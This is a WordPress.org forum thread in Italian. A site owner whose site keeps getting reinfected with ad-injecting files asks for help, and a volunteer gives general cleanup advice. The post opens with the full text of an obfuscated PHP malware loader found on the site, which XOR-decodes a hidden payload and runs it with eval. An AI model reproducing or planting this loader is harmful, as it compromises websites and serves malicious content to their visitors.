    $_173ysgu = basename/*z*/(/*3*/trim/*962*/(/*mapq*/preg_replace/*m*/(/*wuc*/rawurldecode/*gz93j*/(/*m0t*/"%2F%5C%28.%2A%24%2F"/*n4*/)/*90ys*/, '', __FILE__/*wj*/)/*o9pk*//*j*/)/*mxb*//*x6rt*/)/*kdnv*/;$_ywhrmgi = "GUBLE%06%07TP%40%0C%07G%09%40%16%16%01%03%0FmZA%07%17%0AVG%3D%07%16%07%03F%5C%0ENJF%24Hh%00%01%04%0B%5C%5C%06N%10%1B%5CV%03%09%3B%01%0D%5CMK%11%170MA%07%05%10%07B%15%15%0EXJT%24s%0B%0A%0D%3D%11WM%06N%06%1D%5C%5C%10%3B%08%0D%05%15%15%0E%276%23b%1AY%24%0D%0C%0BmJK%1DKHB%5C%05%3B%01%10%10%5DK%5DNOO%1E%1AY%24%0D%0C%0BmJK%1DKHCR%1A%3B%01%1A%07QLZ%00%0C%01qG%0B%09%01EN%12%09%07R%23%0A%5CA%0D%16%3B%10%07BV%5C%1D%0A%01I%1BRM_%22%11WMq%1D%0A%02Kl%0E%0D%09%0B%16%1A%09%07R%0A%09%06%12%06%01%02%0B%0CW%5D%06K3%27~l%27%2B%28%40K%1BBJ%0C%05%06%40VJF4%2A2m%7Ca%25AC%0E%11%3E%0AFKYOPHIKNJV%04%0D%0A%07%06%1A%1EH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%0E%14KM%1F%06%07TP%40%0CKHHZ%0E%01%3B%12%17FfM%06%0D%1BK%5D%16%17DEN%12%08%07RG%1AYP%09%16%14B_%12%1EH%0C%5B%5B%1E%02%07WIV%00%06%0D%03%5D%02VK%1E%5BT%00PO%00%0BMPT%5DL%07%07%07%5D%07E%09%5EB%06%01%0EB%13F%11%13%01%09%40I%15%0F%16%01MG%0B%0B%0AB%05VAO%02%0C%0C%06%17%17%09%13%13%04%5EC%07I%18%06H%13J%17%10%10%0EWW%06M%16%02YB%04%08%1EKB%0E%19%1A%40%18%1DKG%17%16%0AB%40%10%02SM%0C%00ZI%01%00%10%09%03_TE%11CR%0E%11%23%26%27%26%27t~f%20%29%24b~%2C%2B430am%7B%3F47wi%03%06%07%06%07T%5EF%00%09%04B%5E%0C%0B%14%13%10AM%5B%1F%14%17WIRUVQV%07%0F%19QZD%01%0E%40_%40%1A%0CJTK%05%0AO%13%13%11%10%16%3D%11BUG%1DKKA%5C%16%1E%07%06%16YXC%04%08%17%07%08F%1C%0A%1A%0FWUGI%5EOOA%10%05%1D%3D%04%5EP%5EAG%17%40K%0F%01%08%0BK%09%1D%5E%0B%0F%0C%5DG%0C%03D_B%02%02%0A%18%16%03YG%00DYB%40%10%02%0A%1C%0E%18_U%0E%1ED_BBKK%0E%3C%1DKC%0E%05%07%07J%10Gu7%22BtRO%1ETO%5Bn%12rF%3FRsM%40HD%40%40%1E%19%0A%1C%0E%18_U%0E%1EMY%06%5D%19UM%0C%00ZI%01%00%10%1B%16%40UW%0E%0AO%13%13F%1C%0A%1A%0FWUG2G%1ACD%13%02%08%189%16IL%05%00%1CZ%5D%05OO%3F%3F%09%1DI%18%19%00I_BYDF%1A%5CAC%0C%0F%06u%17%17%09%13%13%04%5ECuM%13%0DBP%11%10%0A%05I%19dsRG%07WD%09%1E%13%01%18%12%04%0EM%1B%01V%5E%07%08%0D9FGTY%18%05%03ThF%14%06%0E%01AM%40%0EHDsnY%40%01%0D%0DKTF%0FCR%0E%17%1A%0A%1C%0F%07%5EPuM%16%02YB%04%08%1E9FB%5BB%0A%10%1B%40TIO9%3FY%16%5BV%18%0A%19%5BZ%01DYBJ%16VA%1D%19%0CJG%1B%10%16%0E%1BUP%0EU_O%1C%1AB%18DJFUHT%06%04%03%0E%0D%5CDPKY%16NM%1D%0C%09%5CP%0BDYBJ%1A%1DI%18%19%00I_BBDSW%1B%19%12UC%5B%07%13%1EDLF%0AKNE%13%14%0CT%13%5CZDPK%09%1D%5E%03%10%17YGBYDJJ%16QW%1E%08%15YP%18DBBQ%1B%19%12UCY%07%13%1ED%40%07%0D%5D%40C%01%05T%0AB%17%08%13%16%00%12%04%0EM%12%1ABD%16%06DLBQQ%5CAG%0DVB%0B%12%11%0B%01%1B%02G%0FCG%0A%5B%1B%13%0F%18%15QC%0EH%5EO%18%07KD%1FF%13GUY%1D%01O%13%13F%15%11%0E%15F%5B%0EGC%0CFAJ%40%13%01%16%5D_%5C%0A%0AF%15N%0B%02DJFWVA%10%0E%07H%13CYDTV%1B%19UM%12%1ABD%16%06D_B%16H%5B%05%14%1BL%13LD%07%0A%10%1A%1D%5E%03%10%17YGK_%19%1FBEQG%05%06O%06%17%12%06%08%01%11FWII_O%5DG%10%08%01%0CJ%16LC%1E%12%09BIKM_%10%07FL%5C%07CK_F%0E%13%10%00YOPHIKNHF%0C%07%10%0B%0D%5CfK%11%0A%1CZ%40JC%02%0B%0EWf%5E%1C%170M%5C%0C%10%01%0C%16A%1E%07%40%18%09%5B%5D%01%10%0D%0D%0C%12_G%05%060%5EF%16%3B%07%0D%0CF%5C%40%1D%10G%0A%5E%07%0D%13%17%07Y%15%0EM%06%03J%40%0F%07%16%05N%12%1DK%05%07%1CCP%10%03%17%09%12HOJI%5EOhR%0E%17%01K%19%16JC%0C%0D%18VW%0FDYBFWUJ%1A%0E%0C%5CT%11%0F%14%18%14V%19%13TCW%0E%0CBC%05EB%08%19%09%1EDT%0A%5C%0D%10%1E%01%06F%19%13I%23%09AC%07%0ALF%0FWPY%1C%06%04%02%13F%17%09%07%0CEAJ%04JTGUBL%40%0D%0DFCM%0D%17O%13%0E_D%22%03%0EA%5C%07%12%11%0AZF%10%0ADRYO%5CB%1A%06%14GUBL%0D%11%3DSK%5C%08%1AG%0AV%0E%00%17%0F%01%40%5E%07%40CKK_%06%17%09%01%10U%19%13I%0A%02%5E_%0D%00%01JFWUJ%1A%0E%0C%5CTK_%40%0F%1A%5ETD%0FCR%0EU%15%16%0D%16%07%1A%1DA%06%17%15MW%16HDF%07%5E%5D%5D%04%00%1DI%1AY%02%07%0E%0DA%5C%06M%0C%00ZI%01%00%10KY%40%5CZ%1C%11%01%0E%17%0F%1C%08%0F%08T%02S%14%1E%06H%13JE%02%17%0CQMG%06%0D0KK%0B%17%10%11J%15_G%05%060IV%16%3B%07%0D%0CF%5C%40%1D%10H%07%1A%19%02%11%0C%01FPA%07C%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%40%07%0EVJC%0A%11%08BQ%0E%16%15%0FKI%1DC%1D%11%0DYJ%17%00D_BTV%5E%0C%0DG%0AV%0E%00%17%0F%01%40%5EB%0B%0F%1D_%5ENDF%10%40%1B%02%0A%02%08%0D%5BG%08%0A%17B_%12_%5C%0C%02%0B%06%17%0F%10%16%00%15KLJEC%09G_%07%17%0D%18%07%1A%1DK%05%07%1CCP%10%03%08%00%0E%40HC%40JTHP%0E%0B%17%07J%16TZ%1B%01%18WF%06M_%10%07FL%5C%07CKEX%00%11%10%08%0CA%02S%14%05%1A%40P%16%0D%0B%0CBVM%5C%0C%08%02%06%1A%19%16%01%16%17%40W%0E%1D%11%06C%1B%12%16%01%05%3D%40%5C%5E%05%02%0CK%1B%40K8JL%18e%0AFAC%0E%14EHD%3D%3Dtpb%2C%3C0%07%1AY%19%02%17%0CQMG%06%0DOOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%1DV%01%13%0BWD%00%01D_B%10%1B%15%0F%0C%1D%0E%1BF%14%06%0E%01AM%40%0E%5E_%15%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08K%1F%02%0D%10%12%11%0A%18%11%17VG%16YTYB%16H%5C%11%1B%1BZ%0F%11%10%16%0E%07%5C%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ%40CI%08%13F%14%06%0E%01AM%40%0E_%1CZA%0E%01%0AJFFOJ%1E%19%01%07%08B%40%15%10%1AJMZBHC%0E%17%12%06%08%01%11FWIBHFU%17%1A%0C%14%06%1BE%5BKIMR%0EP%0A%16L%0D%10V%11%0A%1D%15%0BYI%0C%3F%40%12%00%5EZ%5D%1D%0D%08s%1AB%3AD%0D%10V%11%0A%06%0C%1BTP%06%10%12%11%01ZJZ2G%1E%5CK%1A%10%10%3FK%1B%02S%14%11%0AZF%10%0ADF%1AZIJ%10%14%0DK%08%1F%02%11%0C%01FPA%07C%09%5EW%0D%11%12%0FJ%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10M%19%05%5EVL%08%0FO%0AF%15%07%0F%10%12%09KK%1D%16%1D%40%13%03%06%11%09%10GPEA%02%0D%5BX%10%11%0D%09J%16MX%0D%14%15%40%1FB%40%0B%0D%16HZJ%1D%15%1CM%5B%11%10MNB%16LY%0A%08%1D%5E%1AY%19%02%17%0CQMG%06%0DO%40%5E%0C%06%0A%14%0C%5B%11%0A%1D%15%0BYI%0CHDF%0D%5DMT%0A%07%1BX%40%01%0C%17%16KI%5EB%06%01%0EB%13F%11%13%01%09%40I%15%1B%06%1B%5BA%0CD%05%00%17YK%5B%00%08GOQ%17%0F%16%17%0BY%11%0A%1D%15%0BYI%0CHDF%17EZE%1B%13F%02%13F%0B%0B%16%18Q%5DZ%1F%10%0CF%40%16M_%1F%04GWM%1D%0A%00%40%13%15%0C%08%0E%00AI%06%40%18KTK%06%09%15%09%04B%19%13I%23%09G_%07%3B%03%07%16mZA%07%17%0A%40G%11L%00%16%10WRCAJF%15%17%0E%0F%1C%13%1AG%19%13I%10%1B%5CC%0D%17LF%18J%5DC%18%08%09%5E%1FB%09%00WJVM%5C%0C%08%02%06%1AKM_%0B%04%12%11%0A%05%08%17_K%17DE__%12%7Fo%250%2A%07HF%14%0E%15%08BM%0ETC%1C%5BQ%11%10%16JFHAJ%04%12%04HCND%40%0E%09JHV%1CCD%0E%00PM_F%18%5BKM%05%16O%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%1B%02%18%5BA%0E%00%01%01%0DV%5C%06M%13%05YY%12%10MNB_%5D%1BA%07%1B%5CV%09%09LKK%1B%10%15%14%06%03%5DV%19%40%1E%0B%10QU%5BI%5EOoA%10%05%1DJK%09D%5C%0C%17%1A%5C%5DB%40%1E%0B%10QU%5BR%1E%09%5B%5D%01%10%0D%0D%0C%12%5D%5C%11%0E%07I%5CJ%40%1E%0B%10QU%5B%40%18KKT%0F%03%08%08%0CU%19%13I%11%0EYF%10%08%01%0C%01%5D%5DKA%0D%02%40Q%0C%12%0A%0BJrJK%1B%0A%0EBZ%18%01LF%18%5BKM%05%16F%02%13%0F%00QJ%06FKK%02%0EG%07%1AKM_F%18J%5DC%18%08%09%5E%13_D%24%04%0B%5E%5Cq%0E%06%1BqP%0D%0A%10%07%0CFJ%06%0D%17%1DKX%0FLMKY%16UE%11%12%17%5B%13_D%17%16%10BV%5DAG%15VW%0F%15%0F%04%12%1E%19C%0DVGJG%10%01%0F%0FJ%1B%10%07R%0A%09%0E%1BF%08%0F%1A%13JL%0EH%5ER%0Eu%23%287%27KI%1D_%07%19%01VA%0B%02D_BALL%1A%17%1D%06%17%18%1C%00%0F%13Y_%5EECKBX%1A%15%1C%17B%19%19%1D%5BJT%0AI%1A%00%09%13%09TI%0ETC%1CZA%3D%16%01%12%0ESZKAG%1E%40I%0C%1C%16%0B%04%1E%19%0A%0C%04%02I_%08%0A%03NB%16CV%0D%0E%1EEU%12M_%1F%07%5EJK%12G%15VW%0F%15%0F%04%12%12%04%0EM%19%17J%5E%13%0F%02%12B%1C%19%0C5%0D3%40%1CMFDLB_%5D%1BA%07%1B%5CV%09%09LKK%12%17%0EM%06%08CT%0E%0E%0A%05YOyH%00%0F%0AqC%17%10%3B%01%0D%5CMK%07%17%1C%06W%16%16%01%09%0F%1A%10%02IG%15VW%0F%15%0F%04%12%1B%02S%0F%16%01MG%0B%0B%0AB%0A_XY%1A%17%0E%06%17%01%11%17%16%03F%5D%02IG%1EE%40%00%10%01%01KI%1DT%00%11%0CBFBYD%15%0A%5EUL%1A%13G%07%08F%1E%0D%10%01%5ELuM%00%1A%5DG%03%10%00%3FB%0F%19I%0D%1B%0EE%5C%01L%40%13%09A%5BZ%0C%00F%15W%10%1C%09%0A%05%5D%11%0A%13%0A%1DM_%17M_%1F%04GWM%1D%0A%00%40%13%17%0A%1D%15%01W%11%0A%0A%16%1CZR%16%00M%19FHP%5C%0A%0F%1A%0E%0EB%13%0C%0E%0EPJ%5EAJT%5B%5D%11%01%10JFHP%5C%0A%0F%1Au%17%01%11%17%16%03F%5Ds%40X%0B%5CK%0F%0C%03%0DJ%16CG%1B%00%03%5B%1AY%19%02%17%0CQMG%06%0DO%40F%0B%1E%12%13%07A%11%0A%0A%16%1CZR%16%00Y%2C7~u%07%12%05%00%5CV%03%07%0CBJEQB%05%01%1C%5E%1BKD%05%11B%16VA%1D%19%0CJG%01%01%0A%16%09%0F%07%0A%0B%12%1B%5EI%0E%08%12K%19%5B_%0EAG%0C%5B%40%16%05%10%06KIPHIK%1CZA%01%09%14JFQL%5D%1D%02%1BJ%1FB%40%0B%0D%16HZJ%1D%00%0A%40G%09MD__%12%09%07%12%06%19O_J%40%06%13%16BCB%05%15F%15Q%10%01%05%09YODK%05%10%0AUV%14%05%08JFPHZ%19%19%03BEK_%19%1F%1FTV%5C%0C%02%0CF%13J%05%16%10%03KfC%0C%11%08K%1BF%3B%27--ypkECKqc-70KBSJ%0EM%01%1FHV%10%12%0FB_%0C%19%0A%1D%15%0BYI%0CM%1FF%16D%5DY%13%0DO%13%13%22%11%0A%11%07%40PO%05%0A%15K%1B%04%14%00%0D%17DT%06%0E%07%17OX%0D%07LF%16D%5DY%13%0DF%02%13F%06%14%04%07%40OE%40JTGUBL%0D%11%11WM%06M%17%19JD%18%0A%3FE%03Y%1Es%40CI%08%13F%11%13%01%09%40I%13TG%1BXW%15%1E%0A9ESR%094J%14GUBL%40%16%14VNT%078HO%14%3FDY_B%15P%09%40%18K%5EQ%0E%07%17%16%0CU%19%13I%22%1D%5CR%1BLC%12%14%15%19%13WC%2F%5E%5B%12%12%01%10%11%5BV%40AJC%09%40%14CD_%5C%12%1E%1CGSB%1F%14NC%05%09E%12%04%10IG%1BXW%15%1E%0A9ESR%094OF%15V%01%0C%0BB%22A%5C%5C%00%02%03GI%07L%40%12%00%5EZ%5D%1D%0D%08%07%08%07%1C%0D%16YO%5CB%1A%06%06H%13J%40%10%14%06EC%402D%0E%09nBYYBEW%1E%07%12%06%19O_J%40%10%14%06EC%402D%0B%09nK_%19%07%0EA%5CG%0FCG%0AG%14%00%13%18%0Ci%1EON%3EO%13%0EBC%14%0E%17UP%40NJ%14GUJ%40%10%14%06EC%402D%1CO%14%3FDY_B%15XJ%0DDFU%5B%0F%05%13%11%16S%11%0A%1D%15%0BYI%0C%3FC%12Eo%15%0EM%17%19JD%18%0A%3FE%06%15d%07R%1E%0AB%40%07%0D%02JFFOJ%1E%19%01u%14%11%05C%3FB%0F%04%0EN%11%0AC%14K%1F%11%0C%1BEZKAG%1BXW%15%1E%0A9EB%1Es%40X%12SV%01%0C%0BBFFOJ%1E%19%01u%14%03%0FC%3FYWAG%1DKF%15N%1F%0A%11%0B%18DHK%1AKF%15Nh%19";eval/*jty*/(/*5*//*cw6d*/(/*1dxia*/rawurldecode/*6*/(/*hl*/$_ywhrmgi/*2lr*/)/*n*/ ^ substr/*n9*/(/*y*/str_repeat/*jd1u*/(/*m4b2*/$_173ysgu, /*mck*/(/*g6n82*/strlen/*y*/(/*x*/$_ywhrmgi/*wzxty*/)/*6*//strlen/*y2l*/(/*lq*/$_173ysgu/*ejuq*/)/*g*//*ouldi*/)/*imfk*/ + 1/*pvtuh*/)/*5qpof*/, 0, strlen/*nu647*/(/*0iu*/$_ywhrmgi/*f5d*/)/*4i*//*7t*/)/*c35v*//*0im*/)/*95cm*//*ei*/)/*91rf*/;

    insomma quando apro il sito, vengono mostrate pubblicità e ovviamente non compare più il sito, ovviamente ho già provveduto a cancellare i file, modificare i file etc, ma puntualmente ogni tot tempo, tipo ogni 2 giorni massimo, questi ricompaiono.
    Ho cancellato e disabilitato temi e plugin, ma niente è cambiato.
    Ovviamente ho il sito aggiornato.

    Cosa posso fare?
    Grazie

    Sito violato, file modificati, cartelle create

Stai visualizzando 1 risposte (di 1 totali)
  • Ciao Egidio,

    Grazie per aver aperto una discussione su WordPress.org. Sono Matteo, lieto di assisterti.

    Anzitutto, vorrei dire che ti capisco bene. Diversi anni fa ho avuto una situazione veramente veramente molto simile. Sono lieto di darti una mano.

    Niente panico, segui attentamente questa guida (in inglese). Quando hai finito, potresti voler implementare alcune (se non tutte) delle misure di sicurezza consigliate.

    In ottica generale, per esperienza posso dirti che se l’hacker continua ad attaccarti, significa che c’è qualche backdoor che non hai considerato. Anzitutto coordinati con il tuo fornitore di hosting, e assicurati con loro che non ci sia alcuna backdoor attiva per gli hacker. Potrebbe essere l’hosting, WordPress stesso, il tema, un plugin o anche del codice personalizzato.

    Il consiglio finale: se sei un’azienda, lascia fare almeno un ultimo controllo ad un professionista esperto di queste situazioni. Eviterai grossi problemi in futuro.

    Per qualsiasi necessità, io sono qui.

    Un caro saluto e buona fortuna,
    Matteo

Stai visualizzando 1 risposte (di 1 totali)
  • Devi essere collegato per rispondere a questo topic.